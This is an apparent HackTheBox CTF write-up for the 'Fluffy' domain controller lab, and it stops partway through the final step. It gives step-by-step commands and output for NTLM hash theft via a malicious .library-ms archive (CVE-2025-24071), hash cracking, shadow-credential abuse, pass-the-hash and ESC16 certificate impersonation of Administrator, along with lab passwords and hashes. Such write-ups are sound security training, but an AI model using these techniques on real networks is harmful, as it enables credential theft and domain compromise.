> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hackthebox-cpts-track/htb-fluffy.md).

# HTB - Fluffy

HackTheBox · Windows · DC01 @ 10.129.232.88 · Domain: fluffy.htb

## NMAP

```bash
┌──(ajay㉿kali)-[~]
└─$ nmap -sV -v -A 10.129.232.88    
Starting Nmap 7.98 ( https://nmap.org ) at 2026-05-24 16:00 -0400
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-05-25 03:00:40Z)
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-05-25T03:02:08+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.fluffy.htb, DNS:fluffy.htb, DNS:FLUFFY
| Issuer: commonName=fluffy-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-04-30T16:09:59
| Not valid after:  2106-04-30T16:09:59
| MD5:     f5e3 ec00 5fd1 2a95 a76b 2fd6 4726 4d67
| SHA-1:   6867 9230 5123 dcf1 9352 e081 4148 7fef 13c7 6c0a
|_SHA-256: a90d f4d0 6fe1 9052 822e 708e 65e8 2c70 24d5 8ef7 692a b346 da07 47d5 d81f 36ee
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-05-25T03:02:09+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.fluffy.htb, DNS:fluffy.htb, DNS:FLUFFY
| Issuer: commonName=fluffy-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-04-30T16:09:59
| Not valid after:  2106-04-30T16:09:59
| MD5:     f5e3 ec00 5fd1 2a95 a76b 2fd6 4726 4d67
| SHA-1:   6867 9230 5123 dcf1 9352 e081 4148 7fef 13c7 6c0a
|_SHA-256: a90d f4d0 6fe1 9052 822e 708e 65e8 2c70 24d5 8ef7 692a b346 da07 47d5 d81f 36ee
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-05-25T03:02:08+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.fluffy.htb, DNS:fluffy.htb, DNS:FLUFFY
| Issuer: commonName=fluffy-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-04-30T16:09:59
| Not valid after:  2106-04-30T16:09:59
| MD5:     f5e3 ec00 5fd1 2a95 a76b 2fd6 4726 4d67
| SHA-1:   6867 9230 5123 dcf1 9352 e081 4148 7fef 13c7 6c0a
|_SHA-256: a90d f4d0 6fe1 9052 822e 708e 65e8 2c70 24d5 8ef7 692a b346 da07 47d5 d81f 36ee
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-05-25T03:02:09+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.fluffy.htb, DNS:fluffy.htb, DNS:FLUFFY
| Issuer: commonName=fluffy-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-04-30T16:09:59
| Not valid after:  2106-04-30T16:09:59
| MD5:     f5e3 ec00 5fd1 2a95 a76b 2fd6 4726 4d67
| SHA-1:   6867 9230 5123 dcf1 9352 e081 4148 7fef 13c7 6c0a
|_SHA-256: a90d f4d0 6fe1 9052 822e 708e 65e8 2c70 24d5 8ef7 692a b346 da07 47d5 d81f 36ee
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
```

The TLS certificate confirms the domain as `fluffy.htb` with the DC hostname `DC01.fluffy.htb`.

Add them to the hosts file `/etc/hosts.`

### SMB&#x20;

We are given the below credentials to complete the lab

`j.fleischman / J0elTHEM4n1990!`

```bash
┌──(ajay㉿kali)-[~]
└─$ nxc smb 10.129.232.88 -u  'j.fleischman' -p 'J0elTHEM4n1990!' 
SMB         10.129.232.88   445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.232.88   445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
```

Credentials are validated through nxc and can be used to enumerate shares.

```shellscript
┌──(ajay㉿kali)-[~]
└─$ nxc smb 10.129.232.88 -u  'j.fleischman' -p 'J0elTHEM4n1990!' --shares
SMB         10.129.232.88   445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.232.88   445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
SMB         10.129.232.88   445    DC01             [*] Enumerated shares
SMB         10.129.232.88   445    DC01             Share           Permissions     Remark
SMB         10.129.232.88   445    DC01             -----           -----------     ------
SMB         10.129.232.88   445    DC01             ADMIN$                          Remote Admin
SMB         10.129.232.88   445    DC01             C$                              Default share
SMB         10.129.232.88   445    DC01             IPC$            READ            Remote IPC
SMB         10.129.232.88   445    DC01             IT              READ,WRITE      
SMB         10.129.232.88   445    DC01             NETLOGON        READ            Logon server share 
SMB         10.129.232.88   445    DC01             SYSVOL          READ            Logon server share 
```

`j.fleischman` has read and write permissions on the IT share. We can use smbclient to enumerate share for further enumeration.

```bash
┌──(ajay㉿kali)-[~]
└─$ smbclient //10.129.232.88/IT -U 'j.fleischman%J0elTHEM4n1990!'
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sun May 24 23:29:30 2026
  ..                                  D        0  Sun May 24 23:29:30 2026
  Everything-1.4.1.1026.x64           D        0  Fri Apr 18 11:08:44 2025
  Everything-1.4.1.1026.x64.zip       A  1827464  Fri Apr 18 11:04:05 2025
  KeePass-2.58                        D        0  Fri Apr 18 11:08:38 2025
  KeePass-2.58.zip                    A  3225346  Fri Apr 18 11:03:17 2025
  Upgrade_Notice.pdf                  A   169963  Sat May 17 10:31:07 2025

                5842943 blocks of size 4096. 1896037 blocks available
smb: \> dir
  .                                   D        0  Sun May 24 23:29:30 2026
  ..                                  D        0  Sun May 24 23:29:30 2026
  Everything-1.4.1.1026.x64           D        0  Fri Apr 18 11:08:44 2025
  Everything-1.4.1.1026.x64.zip       A  1827464  Fri Apr 18 11:04:05 2025
  KeePass-2.58                        D        0  Fri Apr 18 11:08:38 2025
  KeePass-2.58.zip                    A  3225346  Fri Apr 18 11:03:17 2025
  Upgrade_Notice.pdf                  A   169963  Sat May 17 10:31:07 2025

                5842943 blocks of size 4096. 1896333 blocks available
smb: \> mget *
Get file Everything-1.4.1.1026.x64.zip? y
getting file \Everything-1.4.1.1026.x64.zip of size 1827464 as Everything-1.4.1.1026.x64.zip (553.5 KiloBytes/sec) (average 553.5 KiloBytes/sec)
Get file KeePass-2.58.zip? y
getting file \KeePass-2.58.zip of size 3225346 as KeePass-2.58.zip (765.8 KiloBytes/sec) (average 672.5 KiloBytes/sec)
Get file Upgrade_Notice.pdf? y
getting file \Upgrade_Notice.pdf of size 169963 as Upgrade_Notice.pdf (256.1 KiloBytes/sec) (average 638.7 KiloBytes/sec)
```

The IT share contains two software packages — Everything v1.4.1.1026 (a file search utility) and KeePass 2.58 (a password manager) — alongside an `Upgrade_Notice.pdf.`

Downloading all three with `mget *`, the PDF turns out to be the most interesting find: it lists several unpatched CVEs affecting the installed software versions.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FbUVJJlZsb60WOWDQOuIW%2Fimage.png?alt=media&amp;token=9fe715f3-c191-455e-80d1-81babf433613" alt=""><figcaption></figcaption></figure>

The most significant entry on that list is CVE-2025-24071, which is a widely discussed Windows spoofing and information disclosure vulnerability tied directly to Windows File Explorer and NTLM/SMB network mechanics.

### Exploiting CVE-2025-24071

This specific flaw allows remote attackers to force an interaction with an external SMB server when a user interacts with or browses a directory containing a crafted file type (such as a `.library-ms` file), initiating an automatic authentication attempt over NTLM.

#### NTLM Theft&#x20;

A quick google search gave me an exploit poc that i can use aganist the SMB service to leak the NTLM hash. To trigger the information disclosure, an exploit utility is used to package a malicious `.library-ms` file inside a compressed archive. This file points back to the attacker-controlled IP address.&#x20;

You can find the exploit at :  <https://github.com/Marcejr117/CVE-2025-24071_PoC>

Step : 1 Run the exploit to create a zip file for uploading to the SMB share

```shellscript
┌──(ajay㉿kali)-[~]
└─$ python3 exploit_library.py -i 10.10.16.135 -n system_update_configs -o ./output --keep
[*] Generating malicious .library-ms file...
[+] Created ZIP: output/system_update_configs.zip
[!] Done. Send ZIP to victim and listen for NTLM hash on your SMB server.
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FKZY3NmdeIzmCkipScShh%2Fimage.png?alt=media&amp;token=16ce2007-b515-440f-96a0-1ef6a0f323cf" alt=""><figcaption></figcaption></figure>

Step 2: Before deploying the archive to the target network, an authentication listener must be active on the attack machine to capture the incoming NetNTLMv2 exchange. `Responder` is utilized on the active interface (`tun0`) to listen for SMB authentication requests.

```bash
┌──(ajay㉿kali)-[~/Tools/ntlm_theft/safe.url]
└─$ sudo responder -I tun0 -dwv
[sudo] password for ajay: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|
```

Step 3: Upload the zip file to the smb share

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FHDJEdFQ9yNoVeVz5klnO%2Fimage.png?alt=media&amp;token=39cb9d9a-bcc7-4088-b858-4664071bc82e" alt=""><figcaption></figcaption></figure>

Step 4 : Wait for a moment and observe the Responder to grab the hash. Once the victim user or automated process interacts with the uploaded archive or its contents, Windows File Explorer attempts to resolve the external path defined in the malicious library file, passing the user's network credentials automatically.

```bash
[SMB] NTLMv2-SSP Client   : 10.129.232.88
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash     : p.agila::FLUFFY:383d449ca38552a4:9B328F60FED1373571CDFE928F8CF0AA:010100000000000000DFF1809DEBDC01241A56F9EE996D440000000002000800360031004F00320001001E00570049004E002D00470038004C0048005A00330030004700570039004A0004003400570049004E002D00470038004C0048005A00330030004700570039004A002E00360031004F0032002E004C004F00430041004C0003001400360031004F0032002E004C004F00430041004C0005001400360031004F0032002E004C004F00430041004C000700080000DFF1809DEBDC0106000400020000000800300030000000000000000100000000200000B34569092EFDF096DE654E6765E76F29B206F673A951100700810936FD10AC030A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310036002E003100330035000000000000000000 
```

save the hash to a file and use hashcat to crack the hash.

```bash
┌──(ajay㉿kali)-[~]
└─$ hashcat -m 5600 p_agila_hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v7.1.2) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-skylake-avx512-11th Gen Intel(R) Core(TM) i5-11320H @ 3.20GHz, 1456/2912 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
P.AGILA::FLUFFY:383d449ca38552a4:9b328f60fed1373571cdfe928f8cf0aa:010100000000000000dff1809debdc01241a56f9ee996d440000000002000800360031004f00320001001e00570049004e002d00470038004c0048005a00330030004700570039004a0004003400570049004e002d00470038004c0048005a00330030004700570039004a002e00360031004f0032002e004c004f00430041004c0003001400360031004f0032002e004c004f00430041004c0005001400360031004f0032002e004c004f00430041004c000700080000dff1809debdc0106000400020000000800300030000000000000000100000000200000b34569092efdf096de654e6765e76f29b206f673a951100700810936fd10ac030a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310036002e003100330035000000000000000000:prometheusx-303
```

New creds `p.agila : prometheusx-303`

## Collecting Bloodhound Loot

Before running heavy enumeration tools, use `netexec` (or `crackmapexec`) to verify the credentials against the Domain Controller (DC) over SMB or LDAP.

`nxc smb 10.129.232.88 -u 'p.agila' -p 'prometheusx-303' -d 'FLUFFY'`

BloodHound requires a data collection step (ingestion) to map out Active Directory relationships, group memberships, and trust paths. Since the attack machine is  Kali Linux, the Python-based ingestor `bloodhound-python` can be used remotely over the network using the compromised credentials.

```bash
┌──(ajay㉿kali)-[~]
└─$ bloodhound-python -u 'p.agila' -p 'prometheusx-303' -d 'fluffy.htb' -ns 10.129.232.88 -c All                            
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: fluffy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Testing resolved hostname connectivity dead:beef::e5bb:15f9:6235:1881
INFO: Trying LDAP connection to dead:beef::e5bb:15f9:6235:1881
INFO: Testing resolved hostname connectivity dead:beef::df
INFO: Trying LDAP connection to dead:beef::df
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Testing resolved hostname connectivity dead:beef::e5bb:15f9:6235:1881
INFO: Trying LDAP connection to dead:beef::e5bb:15f9:6235:1881
INFO: Testing resolved hostname connectivity dead:beef::df
INFO: Trying LDAP connection to dead:beef::df
INFO: Found 10 users
INFO: Found 54 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.fluffy.htb
INFO: Done in 00M 19S
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FJsydh63PRjcr9YtaupEX%2Fimage.png?alt=media&amp;token=31e1244b-c577-4129-bea5-174d9a193949" alt=""><figcaption></figcaption></figure>

Next login through the blood cgi and upload the collected loot.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F6QlgplN5onveUQDspcB5%2Fimage.png?alt=media&amp;token=cc175be6-cc7e-4216-97c5-df9b62026684" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FfmPwqju9u0guakIIupGb%2Fimage.png?alt=media&amp;token=cd9e656a-4bb4-4b40-ab30-c973cd4b7933" alt=""><figcaption></figcaption></figure>

After successfully ingesting the collected JSON data into BloodHound, the analytical focus shifts to mapping permissions and finding attack paths originating from the compromised `p.agila` account.

By searching for the `p.agila` node and examining its outbound object control, a distinct privilege escalation path is revealed:

* Group Membership: The user `p.agila` is a direct member of the Service Account Managers security group.
* Inherited Permissions: Due to this group membership, `p.agila` inherits all security rights assigned to the group.
* Target Object Control: The *Service Account Managers* group possesses `GenericAll` permissions over the Service Accounts Organizational Unit (OU) or specific service account objects.

### Exploiting GenericAll

The `GenericAll` right grants full control over the target objects. In the context of Active Directory exploitation, inheriting `GenericAll` over service accounts allows an attacker to perform several high-impact maneuvers, including:

* Password Resets: Forcing a password change on any service account within that container without knowing the current password.
* Service Principal Name (SPN) Manipulation: Modifying or adding SPNs to configure the accounts for targeted attacks such as Kerberoasting.
* Object Modification: Altering user account control flags or group memberships associated with those service accounts.

To leverage these inherited permissions, the `GenericAll` right allows us to directly modify group memberships within the target container. Using Impacket's `net.py` utility remotely from the Kali Linux machine, we can add the `p.agila` user directly into the Service Accounts group, explicitly solidifying and expanding our control over those high-value domain objects.

```bash
net rpc group addmem "SERVICE ACCOUNTS" "p.agila" -U "fluffy.htb/p.agila%prometheusx-303" -S "10.129.232.88"
```

Further analysis of the BloodHound graph reveals a critical cascading misconfiguration stemming from the SERVICE ACCOUNTS group.

The `SERVICE ACCOUNTS@FLUFFY.HTB` group possesses `GenericWrite` privileges over three high-value service accounts:

* `WINRM_SVC@FLUFFY.HTB`
* `LDAP_SVC@FLUFFY.HTB`
* `CA_SVC@FLUFFY.HTB`

Because `p.agila` was successfully added to the `SERVICE ACCOUNTS` group in the previous step, the account now inherits these `GenericWrite` permissions.

&#x20;In an Active Directory environment, holding `GenericWrite` over a user object allows an attacker to modify key attributes—such as updating the `servicePrincipalName` (SPN) to perform a targeted Kerberoasting attack, or updating the object's properties to log in via alternative authentication mechanisms.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FRyBmVy1ivVbSgh8Ls4PP%2Fimage.png?alt=media&amp;token=42fa3e46-6814-4d0e-b9db-957939548840" alt=""><figcaption></figcaption></figure>

### Exploiting GenericWrite

Once an account has an SPN, any domain authenticated user can request a Kerberos TGS ticket for it and attempt to crack its password offline.

Let's target WINRM\_SVC first, since gaining that account likely guarantees a direct interactive shell over WinRM.

We can either perform targeted kerberost attack or shadow credential attack.To ensure reliable access, a Shadow Credential Attack is chosen over a traditional targeted Kerberoasting attack.

#### Shadow Credential Attack

I have used certipy for this purpose.

```bash
┌──(ajay㉿kali)-[~]
└─$ certipy shadow auto -u "p.agila@fluffy.htb" -p "prometheusx-303" -account "winrm_svc" -dc-ip 10.129.232.88 -target DC01.fluffy.htb
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '504fbcde2dc34f45bf82d8d3a74f46c3'
[*] Adding Key Credential with device ID '504fbcde2dc34f45bf82d8d3a74f46c3' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '504fbcde2dc34f45bf82d8d3a74f46c3' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'winrm_svc@fluffy.htb'
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[-] Use -debug to print a stacktrace
[-] See the wiki for more information
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': None
```

```
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great
```

When executing the Shadow Credential attack using PKINIT, a Kerberos authentication failure commonly occurs due to clock desynchronization. Kerberos relies heavily on timestamps to prevent replay attacks; if the time difference between the attack machine (Kali Linux) and the Domain Controller (`fluffy.htb`) exceeds the default threshold—typically 5 minutes—the DC will reject the request with a `KRB_AP_ERR_SKEW` (Clock skew too great) error.

To resolve this and proceed with the attack, the local system time must be manually forced to synchronize with the target domain controller.

```bash
┌──(ajay㉿kali)-[~]
└─$ sudo timedatectl set-ntp false
                                                                                                                                                                       
┌──(ajay㉿kali)-[~]
└─$ sudo ntpdate -u 10.129.232.88
2026-05-25 01:43:34.309661 (-0400) +25200.574415 +/- 0.022220 10.129.232.88 s1 no-leap
CLOCK: time stepped by 25200.574415
                                                                                                                                                                       
┌──(ajay㉿kali)-[~]
└─$ date
Mon May 25 01:43:37 AM EDT 2026
```

Now run the certipy command again to get the NTLM hash.

```bash
┌──(ajay㉿kali)-[~]
└─$ certipy shadow auto -u "p.agila@fluffy.htb" -p "prometheusx-303" -account "winrm_svc" -dc-ip 10.129.232.88 -target DC01.fluffy.htb
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '244963233d4e4efaa75eafb6cb1d5967'
[*] Adding Key Credential with device ID '244963233d4e4efaa75eafb6cb1d5967' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '244963233d4e4efaa75eafb6cb1d5967' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'winrm_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'winrm_svc.ccache'
[*] Wrote credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767
```

Got `[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767`

Because the NT hash for `winrm_svc` has been successfully extracted, there is no need to crack the password offline. Instead, a Pass-the-Hash (PtH) technique can be used to authenticate directly over the WinRM protocol.

Using `evil-winrm`, pass the collected NT hash to establish a remote interactive shell session on the target host as the service user.

## Shell as winrm\_svc

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FGHv9pxv1EPlaSp90xpzd%2Fimage.png?alt=media&amp;token=6bb4641b-986e-4801-a853-a3475dc595b2" alt=""><figcaption></figcaption></figure>

Grab the user.txt file located in the desktop folder of svc\_winrm.

```bash
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> ls


    Directory: C:\Users\winrm_svc\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        5/24/2026   7:59 PM             34 user.txt


*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> cat user.txt
***********************************
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop>
```

Repeat the same steps we used to get the NT Hash of svc\_winrm on other two users too.

### Exploiting GenericWrite on ca\_svc

```bash
(ajay㉿kali)-[~]
└─$ certipy shadow auto -u "p.agila@fluffy.htb" -p "prometheusx-303" -account "ca_svc" -dc-ip 10.129.232.88 -target DC01.fluffy.htb
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '201975c4bc414517be92ebb06a4fa8ed'
[*] Adding Key Credential with device ID '201975c4bc414517be92ebb06a4fa8ed' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '201975c4bc414517be92ebb06a4fa8ed' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'ca_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_svc.ccache'
[*] Wrote credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
```

next we can use certipy to enumerate the ca\_svc user for vulnerable templates.

#### Identifying Vulnerable Certificate Templates

```bash
──(ajay㉿kali)-[~]
└─$ certipy find -u "ca_svc@fluffy.htb" -hashes :ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.129.232.88 -vulnerable -stdout
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : fluffy-DC01-CA
    DNS Name                            : DC01.fluffy.htb
    Certificate Subject                 : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
    Certificate Serial Number           : 3150FA7E60CE28AD4DAE41A1B61D8874
    Certificate Validity Start          : 2025-04-17 16:00:16+00:00
    Certificate Validity End            : 3024-04-17 16:12:16+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Disabled Extensions                 : 1.3.6.1.4.1.311.25.2
    Permissions
      Owner                             : FLUFFY.HTB\Administrators
      Access Rights
        ManageCa                        : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        ManageCertificates              : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        Enroll                          : FLUFFY.HTB\Cert Publishers
                                          FLUFFY.HTB\Administrators
        Read                            : FLUFFY.HTB\Administrators
    [!] Vulnerabilities
      ESC16                             : Security Extension is disabled.
    [*] Remarks
      ESC16                             : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates                   : [!] Could not find any certificate templates
                                                                                                                                                                       
┌──(ajay㉿kali)-[~]
└─$ 

```

ESC16 is the path! Security Extension is disabled on the CA. This means we can abuse certificate authentication to impersonate Administrator.

### Exploiting ESC16&#x20;

One resource to help through the Exploitation is <https://medium.com/@muneebnawaz3849/ad-cs-esc16-misconfiguration-and-exploitation-9264e022a8c6>.

Under the ESC16 scenario, an attacker can modify a target account's User Principal Name (UPN) to spoof a high-privilege account (such as `administrator`), request a certificate on behalf of that principal, and then authenticate to recover the domain administrator's NT hash.

**Step 1. Enumerating the Target Account Properties**

Using Certipy from the Kali Linux attack machine, the configuration profile of `ca_svc` is read to confirm its current `userPrincipalName` value:

```bash
─(ajay㉿kali)-[~/Documents]
└─$ certipy account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -user ca_svc read  
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: FLUFFY.HTB.
[!] Use -debug to print a stacktrace
[*] Reading attributes for 'ca_svc':
    cn                                  : certificate authority service
    distinguishedName                   : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
    name                                : certificate authority service
    objectSid                           : S-1-5-21-497550768-2797716248-2627064577-1103
    sAMAccountName                      : ca_svc
    servicePrincipalName                : ADCS/ca.fluffy.htb
    userPrincipalName                   : ca_svc@fluffy.htb
    userAccountControl                  : 66048
    whenCreated                         : 2025-04-17T16:07:50+00:00
    whenChanged                         : 2026-05-25T06:15:17+00:00
                                                                    
```

**Step 2 : Modifying the UPN Attribute**

Set the upn name as administrator.

```bash
──(ajay㉿kali)-[~]
└─$ certipy account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -user ca_svc -upn administrator update
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: FLUFFY.HTB.
[!] Use -debug to print a stacktrace
[*] Updating user 'ca_svc':
    userPrincipalName                   : administrator
[*] Successfully updated 'ca_svc'
```

**Step 3 : Requesting the Spoofed Certificate**

With the UPN updated, Certipy interacts with the Certificate Authority via RPC using the compromised account's context to request a user enrollment certificate. Because the template maps authentication based on the current UPN, the CA issues a certificate assigned to the administrator identity.

```bash
┌──(ajay㉿kali)-[~/Documents]
└─$ certipy req -u administrator -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.129.232.88 -target dc01.fluffy.htb -ca fluffy-DC01-CA -template User
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 23
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
```

**Step 4 : Reverting Changes**

To minimize the exposure window and restore standard authentication flows for domain services, the altered UPN attribute on the `ca_svc` account is immediately reverted back to its original value.

```bash
┌──(ajay㉿kali)-[~/Documents]
